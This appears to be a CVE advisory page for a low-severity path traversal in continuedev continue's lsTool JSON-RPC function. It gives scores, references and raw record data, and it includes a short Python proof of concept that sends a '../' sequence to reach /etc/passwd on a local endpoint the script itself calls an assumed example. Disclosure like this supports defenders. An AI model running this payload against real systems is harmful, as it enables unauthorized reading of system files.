Security Vulnerability Report
中文
CVE-2026-8770 CVSS 3.3 LOW

CVE-2026-8770

Published: 2026-05-18 00:16:37
Last Modified: 2026-05-18 00:16:37
Source: [email protected]

Description

A vulnerability was identified in continuedev continue up to 1.2.22. This affects the function lsTool of the file core/tools/implementations/lsTool.ts of the component JSON-RPC Server. Such manipulation of the argument dirPath leads to path traversal. An attack has to be approached locally. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

continuedev continue <= 1.2.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target URL (Example: localhost default port for JSON-RPC) # Note: Actual endpoint/port depends on the specific configuration of continuedev target_url = "http://127.0.0.1:4100/rpc" # JSON-RPC payload to exploit path traversal in lsTool payload = { "jsonrpc": "2.0", "method": "lsTool", # The vulnerable function "params": { # Manipulate dirPath to traverse directories (e.g., accessing /etc/passwd on Linux) # Using several '../' to escape the current working directory "dirPath": "../../../../../../etc/passwd" }, "id": 1 } try: headers = {'Content-Type': 'application/json'} response = requests.post(target_url, data=json.dumps(payload), headers=headers, timeout=5) if response.status_code == 200: result = response.json() print("Exploit successful! Response:") print(json.dumps(result, indent=2)) else: print(f"Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8770", "sourceIdentifier": "[email protected]", "published": "2026-05-18T00:16:37.343", "lastModified": "2026-05-18T00:16:37.343", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in continuedev continue up to 1.2.22. This affects the function lsTool of the file core/tools/implementations/lsTool.ts of the component JSON-RPC Server. Such manipulation of the argument dirPath leads to path traversal. An attack has to be approached locally. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://gist.github.com/YLChen-007/da04e032993a4b2324df915f9ecf9831", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/811428", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364395", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364395/cti", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.